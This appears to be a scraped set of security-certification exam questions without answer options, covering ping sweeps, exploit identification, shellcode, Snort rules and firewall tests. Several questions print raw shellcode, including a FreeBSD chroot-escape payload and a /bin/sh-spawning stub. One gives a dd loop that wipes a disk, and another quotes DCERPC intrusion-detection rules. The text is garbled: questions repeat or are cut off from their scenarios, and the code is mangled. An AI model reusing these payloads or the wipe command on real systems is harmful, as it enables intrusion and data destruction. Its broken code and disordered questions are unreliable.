Why only 13 hosts send a reply while others do not?
One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker’s source IP address.
You send a ping request to the broadcast address 192.168.5.255.
[root@ceh/root]# ping -b 192.168.5.255
WARNING: pinging broadcast address
PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data. 64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms 64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms —
—
—
There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why?
The following exploit code is extracted from what kind of attack?
#define
MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)
&0xff00)8), (((x)&0xff0000)16), (((x)
&0xff000000)24) char infin_loop[]= /* for testing
purposes */ “\xEB\xFE”; char bsdcode[] = /*
Lam3rZ chroot() code rewritten for FreeBSD by
venglin */ “\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80
\x31\xdb\x31\xc0\x43” “\x43\x53\x4b\x53\x53
\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0”
“\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01
\x53\x53\xb0” “\x88\xcd\x80\x31\xc0\x8d\x5e\x01
\x53\x53\xb0\x3d\xcd\x80” “\x31\xc0\x31
\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9”
“\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80
\xfe\xc9\x75” “\xf1\x31\xc0\x88\x46\x09
\x8d\x5e\x08\x53\x53\xb0\x3d\xcd” “\x80
\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88
\x46” “\x07\x89\x76\x08\x89\x46\x0c\x89\xf3
\x8d\x4e\x08\x8d\x56” “\x0c\x52\x51\x53\x53\xb0
\x3b\xcd\x80\x31\xc0\x31\xdb\x53” “\x53\xb0
\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01
\xff\xff\x30” “\x62\x69\x6e\x30\x73\x68\x31
\x2e\x2e\x31\x31\x76\x65\x6e” “\x67\x6c\x69
\x6e”;static int magic[MAX_MAGIC],magic_d
[MAX_MAGIC]; static char *magic_str=NULL;
int before_len=0; char *target=NULL,
*username=”user”, *password=NULL; struct
targets getit;
The following exploit code is extracted from what kind of attack?
What can he infer from this file?
While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect’s workstation. He comes across a file that is just called “file.txt” but when he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x)
((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24) char infin_loop[]= /* for testing purposes */
“\xEB\xFE”;
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
“\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43”
“\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0”
“\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0”
“\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80”
“\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9”
“\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75”
“\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd”
“\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46”
“\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56”
“\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53”
“\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30”
“\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e”
“\x67\x6c\x69\x6e”;
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
What can he infer from this file?
When writing shellcodes, you must avoid ____________ because these will end the string.
When writing shellcodes, you must avoid ____________ because these will end the string.
charhellcode[]
f11 “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b”
f11 “\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd”
f11 “\x80\xe8\xdc\xff\xff\xff/bin/sh”;
voidain()?
{ int?ret;
f11 ?
ret??int?)&ret??;
f11 ?
(*ret)??int)shellcode;
}
What exactly is John trying to do?
John Beetlesman, the hacker has successfully compromised the Linux system of Angent Telecommunications, Inc’s?Webserver running Apache. He has downloaded sensitive documents and database files off the machine.
Upon performing various tasks, Beetlesman finally runs the following command on the Linux box before disconnecting.
for (( i = 0;i<11;i++ )); do
?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done
What exactly is John trying to do?
From the options below, choose the exploit against which this rule applies?
Study the snort rule given:
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; distance:0; within:1; content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193; rev:1;)
From the options below, choose the exploit against which this rule applies?
Why is that?
John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?
What has happened when The connection is successful even though you have FTP blocked at the external firewall?
You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall Quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?
What has happened?
You are running through a series of tests on your network to check for any security vulnerabilities. After normal working hours, you initiate a DoS attack against your external firewall. The firewall quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?
Why is that when he does not see any of the traffic produced by Firewalk?
John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?